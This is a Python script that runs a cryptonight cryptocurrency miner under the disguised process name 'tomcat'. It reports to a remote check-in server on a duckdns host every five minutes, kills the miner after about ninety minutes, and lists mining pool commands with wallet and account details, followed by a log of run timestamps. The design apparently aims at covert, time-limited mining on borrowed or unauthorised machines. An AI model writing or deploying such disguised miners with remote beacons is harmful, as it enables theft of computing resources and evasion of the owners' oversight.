import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:26:06.194166
#2018-02-17 16:12:01.288964
#2018-02-17 18:00:09.152997
#2018-02-17 19:47:01.264254
#2018-02-17 21:33:07.306041
#2018-02-17 23:18:05.338600
#2018-02-18 01:06:07.955585
#2018-02-18 02:53:05.469104
#2018-02-18 04:42:06.241125
#2018-02-18 06:34:04.266136
#2018-02-18 08:23:05.750711
#2018-02-18 10:11:03.463952
#2018-02-18 11:57:07.089644
#2018-02-18 13:42:07.057365
#2018-02-18 15:33:01.735489
#2018-02-18 17:21:07.474763
#2018-02-18 19:10:07.479035
#2018-02-18 20:56:03.956552
#2018-02-18 22:41:07.332591
#2018-02-19 00:30:09.155423
#2018-02-19 02:15:08.538656
#2018-02-19 04:04:07.151620
#2018-02-19 05:48:07.587919
#2018-02-19 07:38:01.343619
#2018-02-19 09:27:04.742498
#2018-02-19 11:17:04.365058
#2018-02-19 13:05:07.488896
#2018-02-19 14:53:05.278965
#2018-02-19 16:42:01.730025
#2018-02-19 18:29:08.635761
#2018-02-19 20:17:03.372163
#2018-02-19 22:06:06.021894
#2018-02-19 23:53:07.283515
#2018-02-20 01:41:02.058682
#2018-02-20 03:29:04.423334
#2018-02-20 05:16:07.448058
#2018-02-20 06:58:06.838063
#2018-02-20 08:45:01.412915
#2018-02-20 10:29:04.932251
#2018-02-20 12:14:01.401846
#2018-02-20 14:02:06.760701
#2018-02-20 15:47:10.812114
#2018-02-20 17:34:04.940422
#2018-02-20 19:21:07.786366
#2018-02-20 21:11:04.220138
#2018-02-20 22:57:08.712051
#2018-02-21 00:39:06.512073
#2018-02-21 02:25:03.870266
#2018-02-21 04:11:05.521967
#2018-02-21 05:58:05.629367
#2018-02-21 07:46:06.270111
#2018-02-21 09:34:07.957833
#2018-02-21 11:22:05.474092
#2018-02-21 13:09:05.153611
#2018-02-21 14:56:08.533805
#2018-02-21 16:45:06.441086
#2018-02-21 18:35:07.632235
#2018-02-21 20:21:06.191182
#2018-02-21 22:10:08.697761
#2018-02-21 23:58:03.743479
#2018-02-22 01:47:07.075400
#2018-02-22 03:34:05.803998
#2018-02-22 05:20:04.720835
#2018-02-22 07:06:01.443785
#2018-02-22 08:54:04.734628
#2018-02-22 10:42:04.305242
#2018-02-22 12:28:10.110464
#2018-02-22 14:14:06.709540
#2018-02-22 16:03:01.709580
#2018-02-22 17:48:10.381886
#2018-02-22 19:35:09.851638
#2018-02-22 21:27:05.404156
#2018-02-22 23:12:06.800342
#2018-02-23 00:59:04.434439
#2018-02-23 02:47:06.821001
#2018-02-23 04:33:05.587403
#2018-02-23 06:20:04.186830
#2018-02-23 08:06:04.453821
#2018-02-23 10:23:05.629723
#2018-02-23 12:18:06.104034
#2018-02-23 14:07:07.162825
#2018-02-23 15:57:02.018443
#2018-02-23 17:41:06.475770
#2018-02-23 19:27:07.631592
#2018-02-23 21:11:05.284916
#2018-02-23 22:57:06.991535
#2018-02-24 00:45:07.102297
#2018-02-24 02:38:01.280000
#2018-02-24 04:32:06.811757
#2018-02-24 06:17:04.113608
#2018-02-24 08:05:04.868901
#2018-02-24 09:49:01.823648
#2018-02-24 11:44:06.692282
#2018-02-24 13:37:04.697622
#2018-02-24 15:24:04.788314
#2018-02-24 17:14:04.184268
#2018-02-24 19:06:03.631846
#2018-02-24 20:54:07.857851
#2018-02-24 23:20:04.081657
#2018-02-25 02:46:01.688923
#2018-02-25 06:33:03.433560